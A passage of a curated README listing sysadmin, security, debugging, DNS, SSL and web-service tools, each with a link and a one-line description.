:small_orange_diamond: <a href="https://www.joedog.org/siege-home/"><b>siege</b></a> - is an http load testing and benchmarking utility.<br>
:small_orange_diamond: <a href="https://github.com/wg/wrk"><b>wrk</b></a> - is a modern HTTP benchmarking tool capable of generating significant load.<br>
:small_orange_diamond: <a href="https://github.com/giltene/wrk2"><b>wrk2</b></a> - is a constant throughput, correct latency recording variant of wrk.<br>
:small_orange_diamond: <a href="https://github.com/tsenart/vegeta"><b>vegeta</b></a> - is a constant throughput, correct latency recording variant of wrk.<br>
:small_orange_diamond: <a href="https://github.com/codesenberg/bombardier"><b>bombardier</b></a> - is a fast cross-platform HTTP benchmarking tool written in Go.<br>
:small_orange_diamond: <a href="https://github.com/cmpxchg16/gobench"><b>gobench</b></a> - http/https load testing and benchmarking tool.<br>
:small_orange_diamond: <a href="https://github.com/rakyll/hey"><b>hey</b></a> - HTTP load generator, ApacheBench (ab) replacement, formerly known as rakyll/boom.<br>
:small_orange_diamond: <a href="https://github.com/tarekziade/boom"><b>boom</b></a> - is a script you can use to quickly smoke-test your web app deployment.<br>
:small_orange_diamond: <a href="https://github.com/shekyan/slowhttptest"><b>SlowHTTPTest</b></a> - is a tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP.<br>
:small_orange_diamond: <a href="https://github.com/OJ/gobuster"><b>gobuster</b></a> - is a free and open source directory/file & DNS busting tool written in Go.<br>
:small_orange_diamond: <a href="https://github.com/ssllabs/ssllabs-scan"><b>ssllabs-scan</b></a> - command-line reference-implementation client for SSL Labs APIs.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/http-observatory"><b>http-observatory</b></a> - Mozilla HTTP Observatory cli version.<br>
</p>
##### :black_small_square: SSL
<p>
:small_orange_diamond: <a href="https://www.openssl.org/"><b>openssl</b></a> - is a robust, commercial-grade, and full-featured toolkit for the TLS and SSL protocols.<br>
:small_orange_diamond: <a href="https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html"><b>gnutls-cli</b></a> - client program to set up a TLS connection to some other computer.<br>
:small_orange_diamond: <a href="https://github.com/nabla-c0d3/sslyze"><b>sslyze
</b></a> - fast and powerful SSL/TLS server scanning library.<br>
:small_orange_diamond: <a href="https://github.com/rbsec/sslscan"><b>sslscan</b></a> - tests SSL/TLS enabled services to discover supported cipher suites.<br>
:small_orange_diamond: <a href="https://github.com/drwetter/testssl.sh"><b>testssl.sh</b></a> - testing TLS/SSL encryption anywhere on any port.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/cipherscan"><b>cipherscan</b></a> - a very simple way to find out which SSL ciphersuites are supported by a target.<br>
:small_orange_diamond: <a href="http://www.tarsnap.com/spiped.html"><b>spiped</b></a> - is a utility for creating symmetrically encrypted and authenticated pipes between socket addresses.<br>
:small_orange_diamond: <a href="https://github.com/certbot/certbot"><b>Certbot</b></a> - is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server.<br>
:small_orange_diamond: <a href="https://github.com/FiloSottile/mkcert"><b>mkcert</b></a> - simple zero-config tool to make locally trusted development certificates with any names you'd like.<br>
:small_orange_diamond: <a href="https://github.com/square/certstrap"><b>certstrap</b></a> - tools to bootstrap CAs, certificate requests, and signed certificates.<br>
:small_orange_diamond: <a href="https://github.com/yassineaboukir/sublert"><b>Sublert</b></a> - is a security and reconnaissance tool to automatically monitor new subdomains.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/mkchain"><b>mkchain</b></a> - open source tool to help you build a valid SSL certificate chain.<br>
</p>
##### :black_small_square: Security
<p>
:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/ch-selinux"><b>SELinux</b></a> - provides a flexible Mandatory Access Control (MAC) system built into the Linux kernel.<br>
:small_orange_diamond: <a href="https://wiki.ubuntu.com/AppArmor"><b>AppArmor</b></a> - proactively protects the operating system and applications from external or internal threats.<br>
:small_orange_diamond: <a href="https://github.com/grapheneX/grapheneX"><b>grapheneX</b></a> - Automated System Hardening Framework.<br>
:small_orange_diamond: <a href="https://github.com/dev-sec/"><b>DevSec Hardening Framework</b></a> - Security + DevOps: Automatic Server Hardening.<br>
</p>
##### :black_small_square: Auditing Tools
<p>
:small_orange_diamond: <a href="https://www.ossec.net/"><b>ossec</b></a> - actively monitoring all aspects of system activity with file integrity monitoring.<br>
:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"><b>auditd</b></a> - provides a way to track security-relevant information on your system.<br>
:small_orange_diamond: <a href="https://www.nongnu.org/tiger/"><b>Tiger</b></a> - is a security tool that can be use both as a security audit and intrusion detection system.<br>
:small_orange_diamond: <a href="https://cisofy.com/lynis/"><b>Lynis</b></a> - battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.<br>
:small_orange_diamond: <a href="https://github.com/rebootuser/LinEnum"><b>LinEnum</b></a> - scripted Local Linux Enumeration & Privilege Escalation Checks.<br>
:small_orange_diamond: <a href="https://github.com/installation/rkhunter"><b>Rkhunter</b></a> - scanner tool for Linux systems that scans backdoors, rootkits and local exploits on your systems.<br>
:small_orange_diamond: <a href="https://github.com/hasherezade/pe-sieve"><b>PE-sieve</b></a> - is a light-weight tool that helps to detect malware running on the system.<br>
</p>
##### :black_small_square: System Diagnostics/Debuggers
<p>
:small_orange_diamond: <a href="https://github.com/strace/strace"><b>strace</b></a> - diagnostic, debugging and instructional userspace utility for Linux.<br>
:small_orange_diamond: <a href="http://dtrace.org/blogs/about/"><b>DTrace</b></a> - is a performance analysis and troubleshooting tool.<br>
:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Ltrace"><b>ltrace</b></a> - is a library call tracer, used to trace calls made by programs to library functions.<br>
:small_orange_diamond: <a href="https://github.com/brainsmoke/ptrace-burrito"><b>ptrace-burrito</b></a> - is a friendly wrapper around ptrace.<br>
:small_orange_diamond: <a href="https://github.com/brendangregg/perf-tools"><b>perf-tools</b></a> - performance analysis tools based on Linux perf_events (aka perf) and ftrace.<br>
:small_orange_diamond: <a href="https://github.com/iovisor/bpftrace"><b>bpftrace</b></a> - high-level tracing language for Linux eBPF.<br>
:small_orange_diamond: <a href="https://github.com/draios/sysdig"><b>sysdig</b></a> - system exploration and troubleshooting tool with first class support for containers.<br>
:small_orange_diamond: <a href="http://www.valgrind.org/"><b>Valgrind</b></a> - is an instrumentation framework for building dynamic analysis tools.<br>
:small_orange_diamond: <a href="https://github.com/gperftools/gperftools"><b>gperftools</b></a> - high-performance multi-threaded malloc() implementation, plus some performance analysis tools.<br>
:small_orange_diamond: <a href="https://nicolargo.github.io/glances/"><b>glances</b></a> - cross-platform system monitoring tool written in Python.<br>
:small_orange_diamond: <a href="https://github.com/hishamhm/htop"><b>htop</b></a> - interactive text-mode process viewer for Unix systems. It aims to be a better 'top'.<br>
:small_orange_diamond: <a href="https://github.com/aristocratos/bashtop"><b>bashtop</b></a> - Linux resource monitor written in pure Bash.<br>
:small_orange_diamond: <a href="http://nmon.sourceforge.net/pmwiki.php"><b>nmon</b></a> - a single executable for performance monitoring and data analysis.<br>
:small_orange_diamond: <a href="https://www.atoptool.nl/"><b>atop</b></a> - ASCII performance monitor. Includes statistics for CPU, memory, disk, swap, network, and processes.<br>
:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Lsof"><b>lsof</b></a> - displays in its output information about files that are opened by processes.<br>
:small_orange_diamond: <a href="http://www.brendangregg.com/flamegraphs.html"><b>FlameGraph</b></a> - stack trace visualizer.<br>
:small_orange_diamond: <a href="https://github.com/zevv/lsofgraph"><b>lsofgraph</b></a> - convert Unix lsof output to a graph showing FIFO and UNIX interprocess communication.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/rr"><b>rr</b></a> - is a lightweight tool for recording, replaying and debugging execution of applications.<br>
:small_orange_diamond: <a href="https://pcp.io/index.html"><b>Performance Co-Pilot</b></a> - a system performance analysis toolkit.<br>
:small_orange_diamond: <a href="https://github.com/sharkdp/hexyl"><b>hexyl</b></a> - a command-line hex viewer.<br>
</p>
##### :black_small_square: Log Analyzers
<p>
:small_orange_diamond: <a href="https://github.com/rcoh/angle-grinder"><b>angle-grinder</b></a> - slice and dice log files on the command line.<br>
:small_orange_diamond: <a href="https://lnav.org"><b>lnav</b></a> - log file navigator with search and automatic refresh.<br>
:small_orange_diamond: <a href="https://goaccess.io/"><b>GoAccess</b></a> - real-time web log analyzer and interactive viewer that runs in a terminal.<br>
:small_orange_diamond: <a href="https://github.com/lebinh/ngxtop"><b>ngxtop</b></a> - real-time metrics for nginx server.<br>
</p>
##### :black_small_square: Databases
<p>
:small_orange_diamond: <a href="https://github.com/xo/usql"><b>usql</b></a> - universal command-line interface for SQL databases.<br>
:small_orange_diamond: <a href="https://github.com/dbcli/pgcli"><b>pgcli</b></a> - postgres CLI with autocompletion and syntax highlighting.<br>
:small_orange_diamond: <a href="https://github.com/dbcli/mycli"><b>mycli</b></a> - terminal client for MySQL with autocompletion and syntax highlighting.<br>
:small_orange_diamond: <a href="https://github.com/dbcli/litecli"><b>litecli</b></a> - SQLite CLI with autocompletion and syntax highlighting.<br>
:small_orange_diamond: <a href="https://github.com/osquery/osquery"><b>OSQuery</b></a> - is a SQL powered operating system instrumentation, monitoring, and analytics framework.<br>
:small_orange_diamond: <a href="https://github.com/ankane/pgsync"><b>pgsync</b></a> - sync data from one Postgres database to another.<br>
:small_orange_diamond: <a href="https://github.com/laixintao/iredis"><b>iredis</b></a> - a terminal client for redis with autocompletion and syntax highlighting.<br>
</p>
##### :black_small_square: TOR
<p>
:small_orange_diamond: <a href="https://github.com/GouveaHeitor/nipe"><b>Nipe</b></a> - script to make Tor Network your default gateway.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/multitor"><b>multitor</b></a> - a tool that lets you create multiple TOR instances with a load-balancing.<br>
</p>
##### :black_small_square: Messengers/IRC Clients
<p>
:small_orange_diamond: <a href="https://irssi.org"><b>Irssi</b></a> - is a free open source terminal based IRC client.<br>
:small_orange_diamond: <a href="https://weechat.org/"><b>WeeChat</b></a> - is an extremely extensible and lightweight IRC client.<br>
</p>
##### :black_small_square: Productivity
<p>
:small_orange_diamond: <a href="https://taskwarrior.org"><b>taskwarrior</b></a> - task management system, todo list <br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://github.com/skx/sysadmin-util"><b>sysadmin-util</b></a> - tools for Linux/Unix sysadmins.<br>
:small_orange_diamond: <a href="http://inotify.aiken.cz/"><b>incron</b></a> - is an inode-based filesystem notification technology.<br>
:small_orange_diamond: <a href="https://github.com/axkibe/lsyncd"><b>lsyncd</b></a> - synchronizes local directories with remote targets (Live Syncing Daemon).<br>
:small_orange_diamond: <a href="https://github.com/rgburke/grv"><b>GRV</b></a> - is a terminal based interface for viewing Git repositories.<br>
:small_orange_diamond: <a href="https://jonas.github.io/tig/"><b>Tig</b></a> - text-mode interface for Git.<br>
:small_orange_diamond: <a href="https://github.com/tldr-pages/tldr"><b>tldr</b></a> - simplified and community-driven man pages.<br>
:small_orange_diamond: <a href="https://github.com/mholt/archiver"><b>archiver</b></a> - easily create and extract .zip, .tar, .tar.gz, .tar.bz2, .tar.xz, .tar.lz4, .tar.sz, and .rar.<br>
:small_orange_diamond: <a href="https://github.com/tj/commander.js"><b>commander.js</b></a> - minimal CLI creator in JavaScript.<br>
:small_orange_diamond: <a href="https://github.com/tomnomnom/gron"><b>gron</b></a> - make JSON greppable!<br>
:small_orange_diamond: <a href="https://github.com/itchyny/bed"><b>bed</b></a> - binary editor written in Go.<br>
</p>
#### GUI Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Terminal emulators
<p>
:small_orange_diamond: <a href="https://github.com/Guake/guake"><b>Guake</b></a> - is a dropdown terminal made for the GNOME desktop environment.<br>
:small_orange_diamond: <a href="https://gnometerminator.blogspot.com/p/introduction.html"><b>Terminator</b></a> - is based on GNOME Terminal, useful features for sysadmins and other users.<br>
:small_orange_diamond: <a href="https://sw.kovidgoyal.net/kitty/"><b>Kitty</b></a> - is a GPU based terminal emulator that supports smooth scrolling and images.<br>
:small_orange_diamond: <a href="https://github.com/alacritty/alacritty"><b>Alacritty</b></a> - is a fast, cross-platform, OpenGL terminal emulator.<br>
</p>
##### :black_small_square: Network
<p>
:small_orange_diamond: <a href="https://www.wireshark.org/"><b>Wireshark</b></a> - is the world’s foremost and widely-used network protocol analyzer.<br>
:small_orange_diamond: <a href="https://www.ettercap-project.org/"><b>Ettercap</b></a> - is a comprehensive network monitor tool.<br>
:small_orange_diamond: <a href="https://etherape.sourceforge.io/"><b>EtherApe</b></a> - is a graphical network monitoring solution.<br>
:small_orange_diamond: <a href="https://packetsender.com/"><b>Packet Sender</b></a> - is a networking utility for packet generation and built-in UDP/TCP/SSL client and servers.<br>
:small_orange_diamond: <a href="https://ostinato.org/"><b>Ostinato</b></a> - is a packet crafter and traffic generator.<br>
:small_orange_diamond: <a href="https://jmeter.apache.org/"><b>JMeter™</b></a> - open source software to load test functional behavior and measure performance.<br>
:small_orange_diamond: <a href="https://github.com/locustio/locust"><b>locust</b></a> - scalable user load testing tool written in Python.<br>
</p>
##### :black_small_square: Browsers
<p>
:small_orange_diamond: <a href="https://www.torproject.org/"><b>TOR Browser</b></a> - protect your privacy and defend yourself against network surveillance and traffic analysis.<br>
</p>
##### :black_small_square: Password Managers
<p>
:small_orange_diamond: <a href="https://keepassxc.org/"><b>KeePassXC</b></a> - store your passwords safely and auto-type them into your everyday websites and apps.<br>
:small_orange_diamond: <a href="https://bitwarden.com/"><b>Bitwarden</b></a> - open source password manager with built-in sync.<br>
</p>
##### :black_small_square: Messengers/IRC Clients
<p>
:small_orange_diamond: <a href="https://hexchat.github.io/index.html"><b>HexChat</b></a> - is an IRC client based on XChat.<br>
:small_orange_diamond: <a href="https://pidgin.im/"><b>Pidgin</b></a> - is an easy to use and free chat client used by millions.<br>
</p>
##### :black_small_square: Messengers (end-to-end encryption)
<p>
:small_orange_diamond: <a href="https://www.signal.org/"><b>Signal</b></a> - is an encrypted communications app.<br>
:small_orange_diamond: <a href="https://wire.com/en/"><b>Wire</b></a> - secure messaging, file sharing, voice calls and video conferences. All protected with end-to-end encryption.<br>
:small_orange_diamond: <a href="https://github.com/prof7bit/TorChat"><b>TorChat</b></a> - decentralized anonymous instant messenger on top of Tor Hidden Services.<br>
:small_orange_diamond: <a href="https://matrix.org/"><b>Matrix</b></a> - an open network for secure, decentralized, real-time communication.<br>
</p>
##### :black_small_square: Text editors
<p>
:small_orange_diamond: <a href="https://www.sublimetext.com/3"><b>Sublime Text</b></a> - is a lightweight, cross-platform code editor known for its speed, ease of use.<br>
:small_orange_diamond: <a href="https://code.visualstudio.com/"><b>Visual Studio Code</b></a> - an open-source and free source code editor developed by Microsoft.<br>
:small_orange_diamond: <a href="https://atom.io/"><b>Atom</b></a> - a hackable text editor for the 21st Century.<br>
</p>
#### Web Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Browsers
<p>
:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/viewMyClient.html"><b>SSL/TLS Capabilities of Your Browser</b></a> - test your browser's SSL implementation.<br>
:small_orange_diamond: <a href="https://caniuse.com/"><b>Can I use</b></a> - provides up-to-date browser support tables for support of front-end web technologies.<br>
:small_orange_diamond: <a href="https://panopticlick.eff.org/"><b>Panopticlick 3.0</b></a> - is your browser safe against tracking?<br>
:small_orange_diamond: <a href="https://privacy.net/analyzer/"><b>Privacy Analyzer</b></a> - see what data is exposed from your browser.<br>
:small_orange_diamond: <a href="https://browserleaks.com/"><b>Web Browser Security</b></a> - it's all about Web Browser fingerprinting.<br>
:small_orange_diamond: <a href="https://www.howsmyssl.com/"><b>How's My SSL?</b></a> - help a web server developer learn what real world TLS clients were capable of.<br>
:small_orange_diamond: <a href="https://suche.org/sslClientInfo"><b>sslClientInfo</b></a> - client test (incl TLSv1.3 information).<br>
</p>
##### :black_small_square: SSL/Security
<p>
:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/"><b>SSLLabs Server Test</b></a> - performs a deep analysis of the configuration of any SSL web server.<br>
:small_orange_diamond: <a href="https://dev.ssllabs.com/ssltest/"><b>SSLLabs Server Test (DEV)</b></a> - performs a deep analysis of the configuration of any SSL web server.<br>
:small_orange_diamond: <a href="https://www.immuniweb.com/ssl/"><b>ImmuniWeb® SSLScan</b></a> - test SSL/TLS (PCI DSS, HIPAA and NIST).<br>
:small_orange_diamond: <a href="https://www.jitbit.com/sslcheck/"><b>SSL Check</b></a> - scan your website for non-secure content.<br>
:small_orange_diamond: <a href="http://www.ssltools.com"><b>SSL Scanner</b></a> - analyze website security.<br>
:small_orange_diamond: <a href="https://cryptcheck.fr/"><b>CryptCheck</b></a> - test your TLS server configuration (e.g. ciphers).<br>
:small_orange_diamond: <a href="https://urlscan.io/"><b>urlscan.io</b></a> - service to scan and analyse websites.<br>
:small_orange_diamond: <a href="https://report-uri.com/home/tools"><b>Report URI</b></a> - monitoring security policies like CSP and HPKP.<br>
:small_orange_diamond: <a href="https://csp-evaluator.withgoogle.com/"><b>CSP Evaluator</b></a> - allows developers and security experts to check if a Content Security Policy.<br>
:small_orange_diamond: <a href="https://uselesscsp.com/"><b>Useless CSP</b></a> - public list about CSP in some big players (might make them care a bit more).<br>
:small_orange_diamond: <a href="https://whynohttps.com/"><b>Why No HTTPS?</b></a> - top 100 websites by Alexa rank not automatically redirecting insecure requests.<br>
:small_orange_diamond: <a href="https://ciphersuite.info/"><b>TLS Cipher Suite Search</b></a>- cipher suite search engine.<br>
:small_orange_diamond: <a href="https://github.com/RaymiiOrg/cipherli.st"><b>cipherli.st</b></a> - strong ciphers for Apache, Nginx, Lighttpd, and more.<b>*</b><br>
:small_orange_diamond: <a href="https://2ton.com.au/dhtool/"><b>dhtool</b></a> - public Diffie-Hellman parameter service/tool.<br>
:small_orange_diamond: <a href="https://badssl.com/"><b>badssl.com</b></a> - memorable site for testing clients against bad SSL configs.<br>
:small_orange_diamond: <a href="https://tlsfun.de/"><b>tlsfun.de</b></a> - registered for various tests regarding the TLS/SSL protocol.<br>
:small_orange_diamond: <a href="https://sslmate.com/caa/"><b>CAA Record Helper</b></a> - generate a CAA policy.<br>
:small_orange_diamond: <a href="https://ccadb.org/resources"><b>Common CA Database</b></a> - repository of information about CAs, and their root and intermediate certificates.<br>
:small_orange_diamond: <a href="https://certstream.calidog.io/"><b>CERTSTREAM</b></a> - real-time certificate transparency log update stream.<br>
:small_orange_diamond: <a href="https://crt.sh/"><b>crt.sh</b></a> - discovers certificates by continually monitoring all of the publicly known CT.<br>
:small_orange_diamond: <a href="https://www.hardenize.com/"><b>Hardenize</b></a> - deploy the security standards.<br>
:small_orange_diamond: <a href="https://cryptcheck.fr/suite/"><b>Cipher suite compatibility</b></a> - test TLS cipher suite compatibility.<br>
:small_orange_diamond: <a href="https://www.urlvoid.com/"><b>urlvoid</b></a> - this service helps you detect potentially malicious websites.<br>
:small_orange_diamond: <a href="https://securitytxt.org/"><b>security.txt</b></a> - a proposed standard (generator) which allows websites to define security policies.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/ssl-config-generator"><b>ssl-config-generator</b></a> - help you follow the Mozilla Server Side TLS configuration guidelines.<br>
</p>
##### :black_small_square: HTTP Headers & Web Linters
<p>
:small_orange_diamond: <a href="https://securityheaders.com/"><b>Security Headers</b></a> - analyse the HTTP response headers (with rating system to the results).<br>
:small_orange_diamond: <a href="https://observatory.mozilla.org/"><b>Observatory by Mozilla</b></a> - set of tools to analyze your website.<br>
:small_orange_diamond: <a href="https://webhint.io/"><b>webhint</b></a> - is a linting tool that will help you with your site's accessibility, speed, security, and more.<br>
</p>
##### :black_small_square: DNS
<p>
:small_orange_diamond: <a href="http://viewdns.info/"><b>ViewDNS</b></a> - one source for free DNS related tools and information.<br>
:small_orange_diamond: <a href="https://dnslookup.org/"><b>DNSLookup</b></a> - is an advanced DNS lookup tool.<br>
:small_orange_diamond: <a href="https://dnslytics.com/"><b>DNSlytics</b></a> - online DNS investigation tool.<br>
:small_orange_diamond: <a href="https://dnsspy.io/"><b>DNS Spy</b></a> - monitor, validate and verify your DNS configurations.<br>
:small_orange_diamond: <a href="https://zonemaster.iis.se/en/"><b>Zonemaster</b></a> - helps you to control how your DNS works.<br>
:small_orange_diamond: <a href="http://leafdns.com/"><b>Leaf DNS</b></a> - comprehensive DNS tester.<br>
:small_orange_diamond: <a href="https://findsubdomains.com/"><b>Find subdomains online</b></a> - find subdomains for security assessment penetration test.<br>
:small_orange_diamond: <a href="https://dnsdumpster.com/"><b>DNSdumpster</b></a> - dns recon & research, find & lookup dns records.<br>
:small_orange_diamond: <a href="https://dnstable.com/"><b>DNS Table online</b></a> - search for DNS records by domain, IP, CIDR, ISP.<br>
:small_orange_diamond: <a href="https://intodns.com/"><b>intoDNS</b></a> - DNS and mail server health checker.<br>
:small_orange_diamond: <a href="http://www.zonecut.net/dns/"><b>DNS Bajaj</b></a> - check the delegation of your domain.<br>
:small_orange_diamond: <a href="https://www.buddyns.com/delegation-lab/"><b>BuddyDNS Delegation LAB</b></a> - check, trace and visualize delegation of your domain.<br>
:small_orange_diamond: <a href="https://dnssec-debugger.verisignlabs.com/"><b>dnssec-debugger</b></a> - DS or DNSKEY records validator.<br>
:small_orange_diamond: <a href="http://ptrarchive.com/"><b>PTRarchive.com</b></a> - this site is responsible for the safekeeping of historical reverse DNS records.<br>
:small_orange_diamond: <a href="http://xip.io/"><b>xip.io</b></a> - wildcard DNS for everyone.<br>
:small_orange_diamond: <a href="https://nip.io/"><b>nip.io</b></a> - dead simple wildcard DNS for any IP Address.<br>
:small_orange_diamond: <a href="https://ceipam.eu/en/dnslookup.php"><b>dnslookup (ceipam)</b></a> - one of the best DNS propagation checker (and not only).<br>
:small_orange_diamond: <a href="https://whatsmydns.com"><b>What's My DNS</b></a> - DNS propagation checking tool.<br>
:small_orange_diamond: <a href="https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/"><b>DNSGrep</b></a> - quickly searching large DNS datasets.<br>
</p>
##### :black_small_square: Mail
<p>
:small_orange_diamond: <a href="https://luxsci.com/smtp-tls-checker"><b>smtp-tls-checker</b></a> - check an email domain for SMTP TLS support.<br>
:small_orange_diamond: <a href="https://mxtoolbox.com/SuperTool.aspx"><b>MX Toolbox</b></a> - all of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool.<br>
:small_orange_diamond: <a href="https://www.checktls.com/index.html"><b>Secure Email</b></a> - complete email test tools for email technicians.<br>
:small_orange_diamond: <a href="http://www.blacklistalert.org/"><b>blacklistalert</b></a> - checks to see if your domain is on a Real Time Spam Blacklist.<br>
:small_orange_diamond: <a href="http://multirbl.valli.org/"><b>MultiRBL</b></a> - complete IP check for sending Mailservers.<br>
:small_orange_diamond: <a href="https://dkimvalidator.com/"><b>DKIM SPF & Spam Assassin Validator</b></a> - checks mail authentication and scores messages with Spam Assassin.<br>
</p>
##### :black_small_square: Encoders/Decoders and Regex testing
<p>
:small_orange_diamond: <a href="https://www.url-encode-decode.com/"><b>URL Encode/Decode</b></a> - tool from above to either encode or decode a string of text.<br>
:small_orange_diamond: <a href="https://uncoder.io/"><b>Uncoder</b></a> - the online translator for search queries on log data.<br>
:small_orange_diamond: <a href="https://regex101.com/"><b>Regex101</b></a> - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.<br>
:small_orange_diamond: <a href="https://regexr.com/"><b>RegExr</b></a> - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).<br>
:small_orange_diamond: <a href="https://www.regextester.com/"><b>RegEx Testing</b></a> - online regex testing tool.<br>
:small_orange_diamond: <a href="https://www.regexpal.com/"><b>RegEx Pal</b></a> - online regex testing tool + other tools.<br>
:small_orange_diamond: <a href="https://gchq.github.io/CyberChef/"><b>The Cyber Swiss Army Knife</b></a> - a web app for encryption, encoding, compression and data analysis.<br>
</p>
##### :black_small_square: Net-tools
<p>
:small_orange_diamond: <a href="https://toolbar.netcraft.com/site_report"><b>Netcraft</b></a> - detailed report about the site, helping you to make informed choices about their integrity.<b>*</b><br>
:small_orange_diamond: <a href="https://atlas.ripe.net/"><b>RIPE NCC Atlas</b></a> - a global, open, distributed Internet measurement platform.<br>
:small_orange_diamond: <a href="https://www.robtex.com/"><b>Robtex</b></a> - uses various sources to gather public information about IP numbers, domain names, host names, etc.<br>
:small_orange_diamond: <a href="https://securitytrails.com/"><b>Security Trails</b></a> - APIs for Security Companies, Researchers and Teams.<br>
:small_orange_diamond: <a href="https://tools.keycdn.com/curl"><b>Online Curl</b></a> - curl test, analyze HTTP Response Headers.<br>
:small_orange_diamond: <a href="https://extendsclass.com/"><b>Online Tools for Developers</b></a> - HTTP API tools, testers, encoders, converters, formatters, and other tools.<br>
:small_orange_diamond: <a href="https://ping.eu/"><b>Ping.eu</b></a> - online Ping, Traceroute, DNS lookup, WHOIS and others.<br>
:small_orange_diamond: <a href="https://network-tools.com/"><b>Network-Tools</b></a> - network tools for webmasters, IT technicians & geeks.<br>
:small_orange_diamond: <a href="https://bgpview.io/"><b>BGPview</b></a> - search for any ASN, IP, Prefix or Resource name.<br>
:small_orange_diamond: <a href="https://isbgpsafeyet.com/"><b>Is BGP safe yet?</b></a> - check BGP (RPKI) security of ISPs and other major Internet players.<br>
:small_orange_diamond: <a href="https://riseup.net/"><b>Riseup</b></a> - provides online communication tools for people and groups working on liberatory social change.<br>
:small_orange_diamond: <a href="https://www.virustotal.com/gui/home/upload"><b>VirusTotal</b></a> - analyze suspicious files and URLs to detect types of malware.<br>
</p>
##### :black_small_square: Privacy
<p>
:small_orange_diamond: <a href="https://www.privacytools.io/"><b>privacytools.io</b></a> - provides knowledge and tools to protect your privacy against global mass surveillance.<br>
:small_orange_diamond: <a href="https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Test+Servers"><b>DNS Privacy Test Servers</b></a> - DNS privacy recursive servers list (with a 'no logging' policy).<br>
</p>
##### :black_small_square: Code parsers/playgrounds
<p>
:small_orange_diamond: <a href="https://www.shellcheck.net/"><b>ShellCheck</b></a> - finds bugs in your shell scripts.<br>
:small_orange_diamond: <a href="https://explainshell.com/"><b>explainshell</b></a> - get interactive help texts for shell commands.<br>
:small_orange_diamond: <a href="https://jsbin.com/?html,output"><b>jsbin</b></a> - live pastebin for HTML, CSS & JavaScript, and more.<br>
:small_orange_diamond: <a href="https://codesandbox.io/"><b>CodeSandbox</b></a> - online code editor for web application development.<br>
:small_orange_diamond: <a href="http://sandbox.onlinephpfunctions.com/"><b>PHP Sandbox</b></a> - test your PHP code with this code tester.<br>
:small_orange_diamond: <a href="https://www.repl.it/"><b>Repl.it</b></a> - an instant IDE to learn, build, collaborate, and host all in one place.<br>
:small_orange_diamond: <a href="http://www.vclfiddle.net/"><b>vclFiddle</b></a> - is an online tool for experimenting with the Varnish Cache VCL.<br>
</p>
##### :black_small_square: Performance
<p>
:small_orange_diamond: <a href="https://gtmetrix.com/"><b>GTmetrix</b></a> - analyze your site’s speed and make it faster.<br>
:small_orange_diamond: <a href="https://performance.sucuri.net/"><b>Sucuri loadtimetester</b></a> - test here the
performance of any of your sites from across the globe.<br>
:small_orange_diamond: <a href="https://tools.pingdom.com/"><b>Pingdom Tools</b></a> - analyze your site’s speed around the world.<br>
:small_orange_diamond: <a href="https://pingme.io/"><b>PingMe.io</b></a> - run website latency tests across multiple geographic regions.<br>
:small_orange_diamond: <a href="https://developers.google.com/speed/pagespeed/insights/"><b>PageSpeed Insights</b></a> - analyze your site’s speed and make it faster.<br>
:small_orange_diamond: <a href="https://web.dev/"><b>web.dev</b></a> - helps developers like you learn and apply the web's modern capabilities to your own sites and apps.<br>
:small_orange_diamond: <a href="https://github.com/GoogleChrome/lighthouse"><b>Lighthouse</b></a> - automated auditing, performance metrics, and best practices for the web.<br>
</p>
##### :black_small_square: Mass scanners (search engines)
<p>
:small_orange_diamond: <a href="https://censys.io/"><b>Censys</b></a> - platform that helps information security practitioners discover, monitor, and analyze devices.<br>
:small_orange_diamond: <a href="https://www.shodan.io/"><b>Shodan</b></a> - the world's first search engine for Internet-connected devices.<br>
:small_orange_diamond: <a href="https://2000.shodan.io/#/"><b>Shodan 2000</b></a> - this tool looks for randomly generated data from Shodan.<br>
:small_orange_diamond: <a href="https://viz.greynoise.io/table"><b>GreyNoise</b></a> - mass scanner such as Shodan and Censys.<br>
:small_orange_diamond: <a href="https://www.zoomeye.org/"><b>ZoomEye</b></a> - search engine for cyberspace that lets the user find specific network components.<br>
:small_orange_diamond: <a href="https://netograph.io/"><b>netograph</b></a> - tools to monitor and understand deep structure of the web.<br>
:small_orange_diamond: <a href="https://fofa.so/"><b>FOFA</b></a> - is a cyberspace search engine.<br>
:small_orange_diamond: <a href="https://www.onyphe.io/"><b>onyphe</b></a> - is a search engine for open-source and cyber threat intelligence data collected.<br>
:small_orange_diamond: <a href="https://intelx.io/"><b>IntelligenceX</b></a> - is a search engine and data archive.<br>
:small_orange_diamond: <a href="https://app.binaryedge.io/"><b>binaryedge</b></a> - it scan the entire internet space and create real-time threat intelligence streams and reports.<br>
:small_orange_diamond: <a href="https://spyse.com/"><b>Spyse</b></a> - Internet assets registry: networks, threats, web objects, etc.<br>
:small_orange_diamond: <a href="https://wigle.net/"><b>wigle</b></a> - is a submission-based catalog of wireless networks. All the networks. Found by Everyone.<br>
:small_orange_diamond: <a href="https://publicwww.com/"><b>PublicWWW</b></a> - find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.<br>
:small_orange_diamond: <a href="https://inteltechniques.com/index.html"><b>IntelTechniques</b></a> - this repository contains hundreds of online search utilities.<br>
